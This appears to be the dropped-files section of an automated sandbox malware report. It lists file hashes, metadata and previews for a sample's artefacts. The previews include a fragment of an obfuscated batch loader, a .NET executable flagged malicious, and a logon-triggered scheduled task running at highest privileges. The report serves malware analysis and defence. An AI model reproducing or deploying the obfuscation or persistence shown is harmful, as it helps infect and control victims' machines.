                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2892
                                                Entropy (8bit):5.437969087793142
                                                Encrypted:false
                                                SSDEEP:48:oizsSU4y4RQmFoUeCamfm9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKL2O9qrh7KWBJ5Eo9Adrxk
                                                MD5:3D05665264FF5F9612A974D7E6FAF75D
                                                SHA1:EFAF5F2EB18DE5070947DE4B2B58F6F8ADF8C00E
                                                SHA-256:F807ED1F52729FE3DDB61E208FCEA8278FA7A7D6358C21055BC640E53E09A12A
                                                SHA-512:F2E2CB6A0248D6186B4EF1FDEFD532D82A663AE3494D6716A80B8134D7B6AEC542D12CD2282F038C6CE33C84E838880CE85927FADB868B46C275D2D806AB18CA
                                                Malicious:false
                                                Preview:@...e...........................................................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:DOS batch file, ASCII text, with very long lines (3583), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):7309406
                                                Entropy (8bit):6.016969361705345
                                                Encrypted:false
                                                SSDEEP:49152:RjtZxa9XGka7V+vlw0ELOZA1NEITyfi7SlSjncYHEJ9MFrbwjMxGQMH+INp1YHpy:Y
                                                MD5:F3454E2CB275019527E248CB08111111
                                                SHA1:4180893CCA4DCE02E0BBEAB52B5A099201DB5FFB
                                                SHA-256:0999322E8A2A984B5400544B31A91AE8DD49B362A2517FE497A8E1455DE07D8F
                                                SHA-512:489A89AB9D9A1423CCD18931F74707851D4E3ADD00306F7BDCCCE511DE308D1FABC14CB734925D78609FD522402E9ABEA1106B1765D5C90A27C32A2A5889C7CC
                                                Malicious:false
                                                Preview:@echo off..%hHWGUYBuKQfdXizhnralBipksPqZjjVATDyHbfvAfWacuRgvQmYUuhvZsMoeH%@%lAUEjtJSghWAfEhmPAJUiWlbgMizpoQrTDLAiPHM%%YgQYUbQRgXOuMtooTyxlkCRrEGCTGdaSWikQvdlKrHjrcWgkwl%e%qkBBvoztnzWkcWVxDixTPnMTC%%AoIzswvOJIvGPCVKXluwgugyDbZrzd%c%IZbOkLOgAPnnncXtVYfpAyfmfijWqxdpGkN%%NNLYjeUHThTwFIdttNXjTPJcBRQcMXGcppFimgfvDytXo%h%qIuJWSnDOYeIxsoRUVAQhqcVgmIBFuvLNOAhIcbOPLBHdDJNhMD%%wxFaGzCKkLXtCsVIRhjSTMbvOuRCCUuTQXo%o%iABjzrEdNifLIbVZCLEKwkllHZ%%preCFeFzrFZtChXHGp% %UBYuqfsDTYppBzjo%%JGAGdBEtDsbDzCEWBfGrXNwmALBcqxTtTlXaPzQZtaNNratvKs%o%tCXOWjngra%%dfyIJoFDhcpGXXZIVzsfrXxARVwbRBtyZRWHpJqe%f%glXdVaRWAsGZUlfHXQOSDMGJRHfastmjnpkMAwVUEeqiMyfGRZrSCm%%tFomoUREhgwLEathBVTnzw%f%WsCzjsbtHbdRhljHaNzibpNAFxSQWIYMXh%..%ULvImfMPKBjmWrnTAZnvGEcTLAlwY%s%qTZTpWEfncpA%%ZwlVyJOyNJMLp%e%BXMUqQHkpmcbrovLkggBcwzENNkEDjnhamdhBiYJvOhYTwr%%cbyFFNGexigCGcHfZUbelnkbhxgopALqwKBBK%t%CnGZKtcwcshbYYumoPQxyiGsOXxPfWBfussOymDRZKuNg%%BMVjvMKnitGnkNWmqgRbHGFG%l%cmZxNOTlBvKUVAOvgjYilcPVNuoWfGVgpwtALQvFMbJslruFcGA%%GyCawdJtAWgUzDEzhoJqO
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):36864
                                                Entropy (8bit):4.3900594222407125
                                                Encrypted:false
                                                SSDEEP:384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
                                                MD5:B943A57BDF1BBD9C33AB0D33FF885983
                                                SHA1:1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
                                                SHA-256:878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
                                                SHA-512:CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Joe Sandbox View:
                                                • Filename: Hydra.ccLoader.bat, Detection: malicious, Browse
                                                • Filename: NhoqAfkhHL.bat, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...GB..........."...0.................. ....@...... ....................................`...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@........................................H......................................................................ga..G.*.I..6..+......6.2..5.tK@.g1.9.....Q...@a..W1...}.... .d......</.X....m..Zg.."."^.F..0......G.c.....(D..(....G...u.KM...........D.|/..J3....?.vMl.-.P...)...RZ..-....|.0.x.....D.....>...G...C..e.....IZem...s....|.l~.c........<d.*..y.W..E..2.&c\z..Z.......................................................................................%%........;m2....2m;............................................
                                                Process:C:\Windows\System32\cmd.exe
                                                File Type:DOS batch file, ASCII text, with very long lines (3583), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):7309406
                                                Entropy (8bit):6.016969361705345
                                                Encrypted:false
                                                SSDEEP:49152:RjtZxa9XGka7V+vlw0ELOZA1NEITyfi7SlSjncYHEJ9MFrbwjMxGQMH+INp1YHpy:Y
                                                MD5:F3454E2CB275019527E248CB08111111
                                                SHA1:4180893CCA4DCE02E0BBEAB52B5A099201DB5FFB
                                                SHA-256:0999322E8A2A984B5400544B31A91AE8DD49B362A2517FE497A8E1455DE07D8F
                                                SHA-512:489A89AB9D9A1423CCD18931F74707851D4E3ADD00306F7BDCCCE511DE308D1FABC14CB734925D78609FD522402E9ABEA1106B1765D5C90A27C32A2A5889C7CC
                                                Malicious:true
                                                Preview:@echo off..%hHWGUYBuKQfdXizhnralBipksPqZjjVATDyHbfvAfWacuRgvQmYUuhvZsMoeH%@%lAUEjtJSghWAfEhmPAJUiWlbgMizpoQrTDLAiPHM%%YgQYUbQRgXOuMtooTyxlkCRrEGCTGdaSWikQvdlKrHjrcWgkwl%e%qkBBvoztnzWkcWVxDixTPnMTC%%AoIzswvOJIvGPCVKXluwgugyDbZrzd%c%IZbOkLOgAPnnncXtVYfpAyfmfijWqxdpGkN%%NNLYjeUHThTwFIdttNXjTPJcBRQcMXGcppFimgfvDytXo%h%qIuJWSnDOYeIxsoRUVAQhqcVgmIBFuvLNOAhIcbOPLBHdDJNhMD%%wxFaGzCKkLXtCsVIRhjSTMbvOuRCCUuTQXo%o%iABjzrEdNifLIbVZCLEKwkllHZ%%preCFeFzrFZtChXHGp% %UBYuqfsDTYppBzjo%%JGAGdBEtDsbDzCEWBfGrXNwmALBcqxTtTlXaPzQZtaNNratvKs%o%tCXOWjngra%%dfyIJoFDhcpGXXZIVzsfrXxARVwbRBtyZRWHpJqe%f%glXdVaRWAsGZUlfHXQOSDMGJRHfastmjnpkMAwVUEeqiMyfGRZrSCm%%tFomoUREhgwLEathBVTnzw%f%WsCzjsbtHbdRhljHaNzibpNAFxSQWIYMXh%..%ULvImfMPKBjmWrnTAZnvGEcTLAlwY%s%qTZTpWEfncpA%%ZwlVyJOyNJMLp%e%BXMUqQHkpmcbrovLkggBcwzENNkEDjnhamdhBiYJvOhYTwr%%cbyFFNGexigCGcHfZUbelnkbhxgopALqwKBBK%t%CnGZKtcwcshbYYumoPQxyiGsOXxPfWBfussOymDRZKuNg%%BMVjvMKnitGnkNWmqgRbHGFG%l%cmZxNOTlBvKUVAOvgjYilcPVNuoWfGVgpwtALQvFMbJslruFcGA%%GyCawdJtAWgUzDEzhoJqO
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):3494
                                                Entropy (8bit):3.5831244567466025
                                                Encrypted:false
                                                SSDEEP:96:tpndEnkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:zUkYx39OhO6jy++
                                                MD5:1AEDAA154572FE5FA7B54B46201EA461
                                                SHA1:7997B0C3E59B5279980C562D8E49D72958EAA1C3
                                                SHA-256:FD2D61CFEAF1A26584E87DAD98D3B1E0C549F31CF5FC52756DC70ECBBF83CC50
                                                SHA-512:B9F907A00346F2FE609B39023854C6779154F70B46FDB15DCEC82E3D6322256EDB8C6CE056C1B4644A075B935B9F0C18EFE26BA17984E4614F1B8129F224F476
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.2.-.1.3.T.0.8.:.5.1.:.2.6...8.6.8.-.0.5.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.m.W.4.1.W.e.M.4.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4680
                                                Entropy (8bit):3.7107512989834324
                                                Encrypted:false
                                                SSDEEP:96:pYMguQII4ia6h4aGdinipV9ll7UY5HAmzQ+:9A4K/xne7HO+
                                                MD5:6FA3F01E12DBB14B7D4E2E143346D0AE
                                                SHA1:1870528ED0891D6E7D8397ECC095AD99934D6640
                                                SHA-256:6F04F9717F6199BDE17B98B982805EB34DB274B13F81376BD1F757963436ABF5
                                                SHA-512:624C29E2D721A8BBDC30D30B46EF3D585C65D32DCD6AEC5EAE08A9E2F8EFC1A447C32B6C170E30730B0E685FE6C44131E955783A5BF6655FC23B892FCDD824A8
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):338
                                                Entropy (8bit):3.974654678850856
                                                Encrypted:false
                                                SSDEEP:6:kKZHvg9dgn8JFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Rvgng3kPlE99SCQl2DUevat
                                                MD5:B7300F3E3E8A2D8ADE4F0F1DE88BA69F
                                                SHA1:CA19A1DBA7E470D5B076D73C352C55BEFD7E0EB4
                                                SHA-256:9A47036AE0A84B509D85A617EB666D77C38F6EF5535AD077C010BA66B558387D
                                                SHA-512:847EAB70357F3BB1F8C2DE216534D92FDE1A04C9692EA752DE540A192BC7A8FFD83C61EC7EC04EEDC6C0A9FECB0C419D07707B7862B2DFA7E9F0F7DFBEA702F8
                                                Malicious:false
                                                Preview:p...... ............Z...(...............`._.ZM..`b...M..`..G.M..........`b...M.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):74512
                                                Entropy (8bit):4.035832365719781
                                                Encrypted:false
                                                SSDEEP:768:Jnfmf+nfmfKgac4bIAbP5AAKP5qf5AKP5dfvoXfSPfm4fGfuszpfn8ynfmfF:3cWHbPNKPTKP3GbzF89
                                                MD5:0DECA055FE2A6121E7C0211467711C3D
                                                SHA1:797CB44D3F93774965854C1B7675E35D25CB0A73
                                                SHA-256:AAF9FBE3C5AA039CFC5BF196288D11F2A568FC3385E5C2AFAD2666CBD3E6FE5B
                                                SHA-512:06B13139DA590BC408D5C89B0D5D7B717361BA7DC22072A3D8486E3D4E9DB5F1EA4C31887073A99732075C13EF28BB8A67608207F68B71B8620886DAE247D6D3
                                                Malicious:false
                                                Preview:ElfChnk.................E.......H....................f.......................................................................k. ............................................=...........................................................................................................................g...............@...........................n...................M...]...........................p...............&...........&...................................................&.......................................**..0...E...........ZM.........r..&........r....6\..."(.M........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 329, DIRTY
                                                Category:dropped
                                                Size (bytes):123792
                                                Entropy (8bit):4.089957956157054
                                                Encrypted:false
                                                SSDEEP:1536:IHi6xadptrX9WP+gQHi6xadptrX9WP+g:tptrX9WP+glptrX9WP+g
                                                MD5:17BD618833710CFA993F02774FE1EE67
                                                SHA1:ED7DC7A37188C0D1BA6EB06DDFBB77758E17087D
                                                SHA-256:490EB67644FB9A2714A49624086CBC3F60138014A02C4D720AB3F94D36295E3F
                                                SHA-512:C376DA073877665F43F59C9390B5515B3F956AE5A4F2D6E08726311ED45BF0749DE8F387C7CA0D7DEBC44C43A6D7AEEAC993D287DCEBA6B96F2515D8FC47D5F3
                                                Malicious:false
                                                Preview:ElfFile.................I....................................................................................................2..ElfChnk.........J...............J...........x.........C.....................................................................sa.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.396148699263237
                                                Encrypted:false
                                                SSDEEP:384:jhONk2SCNCrN0KNoBNoiNKNosaNjN4N9NRNCN8NoNjNUNONXN6N6LNvgN1NkNWzP:jgS5itAsZ2DCIEzVFNtPp
                                                MD5:1714E9F375BF402E9FF7644ED82EC285
                                                SHA1:ECB3A4495CEBE4F270C8D94553F027A36F50C42B
                                                SHA-256:20C6A11A8C455A4E4077CC61001BED7C0DD4E6F4FAADBCAD8DDF9A31406F1051
                                                SHA-512:A376B10C14E4EF653991874DE0D730768CC8D9BD49D8C348EED40CD184DA0C2AB47022B0AF6841B0F260598927C63271550A9B2C30F6A0DB1F6A3F830FC16576
                                                Malicious:false
                                                Preview:ElfChnk.v...............v...................p.......T..q......................................................................D&................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................}.......................}.......................&...M.......M...........................}...................m...................**......v........^.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):66960
                                                Entropy (8bit):4.276569056664267
                                                Encrypted:false
                                                SSDEEP:384:aV+VhhpVAVqVjVWVscVcVtVrV51VgVTV/VZVXKVNVjVyVlF/vVIVtVQVwVEV+VpW:Bb8xf4BsuMgku
                                                MD5:293DC750C5F94575EC83FE0AD210A9F1
                                                SHA1:B9CC6747D060865D1775BC969CB3A1BE4387D3EB
                                                SHA-256:F5EC424EF8678404DEEEC112DB706CDFBD2402124D7618CEE20980DD1438DA9C
                                                SHA-512:7C9FE2BF6E09D66C3F59288F0578AA7E0CA34F152DD54B8037334D323C230DAEB0B5B52F86E6FDA0793CD785EFB16A87DB47967E173E281C7B1266AFEE79F4F1
                                                Malicious:false
                                                Preview:ElfChnk.........G...............G....................-......................................................................N...................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F....................................................'..............&.......................................................................%......**......F......./...ZM..........E!&...............................................................@.......X...a.!.....E..........@/...ZM.....`...IY..`...........F....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p....**......G.......1...ZM..........
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67008
                                                Entropy (8bit):4.402627845753247
                                                Encrypted:false
                                                SSDEEP:384:48hmOm7hImkmAymRvmVkcmhTiYmBmgmUmWmBmbm4my7mcEZmZmtmZ4mRmKmdm5mh:KxkrTiZz+9hZ/+7TSPnSKn
                                                MD5:D4983ED0FEA0501D7D3401BBE1515CDB
                                                SHA1:50CB5E50BDA623C01250F05CEBB1036442B6DC6E
                                                SHA-256:3763F35DAF2433CC5AF4C3328E8B2B881AC9B9312164146C22ED50845486EE51
                                                SHA-512:5D888964B302E67A65B893C6647E120CBAC36E2006E0FA261B3AEE29A316D6239F6760243CEAAEB676DF3F8405F0437D7712875B6D6917C134B15783AA38108B
                                                Malicious:false
                                                Preview:ElfChnk.....................................0........&......................................................................p...................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................;...c#..{1..k:...................v..........**................o.ZM..........E!&...............................................................N.......d..._.!.....[..........@..o.ZM.....`.......`.......0........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c.......r.v....**......
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.45809385281512843
                                                Encrypted:false
                                                SSDEEP:96:eNVaO8sMa3Z85ZMLgrjjIZ3Z85ZQu3Z85ZV3Z85Zu:oV7pp8nMLEvUp8nDp8nVp8n
                                                MD5:67403F43DBEA39FD58964CF1041F8131
                                                SHA1:A916F3AA4BC79FB6BAC000481F9EB57C9F0499D3
                                                SHA-256:7225E069BD47A60AA8785E06EA1396A18D27792941C349EC8D483E923FE1D9BE
                                                SHA-512:50D1F388FA4A33BE6C40DB73122E4FFB05B66BAC8F90D531A669C8163E12AD691EDEA48F39AD099B54D33E858D38497635A3750AB9F16926F94CE65C5230853C
                                                Malicious:false
                                                Preview:ElfChnk.....................................P.......GK........................................................................|.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.248110473220085
                                                Encrypted:false
                                                SSDEEP:1536:YbBN2A4VD7VAx8whAGU2woJQghYAxgRzAlUnF9:
                                                MD5:87681F2AD6FCB19982924DCE6A2D7A27
                                                SHA1:6C4D49C5504D6DE6E63B44753C607B3362B79B57
                                                SHA-256:1CA289F8F7FD7DD1D67EDA5691EF4B083120E456204CC8F6923AFCCD700183BC
                                                SHA-512:8F1309E5DD7B017945ABF5EB7E869AA1C04A27C37DB7C3A735A2CB31D815B67643D37DAD93FB89FFF2B6BC213EAE1E55201075DAEAFA39A6B1656A214990DEBA
                                                Malicious:false
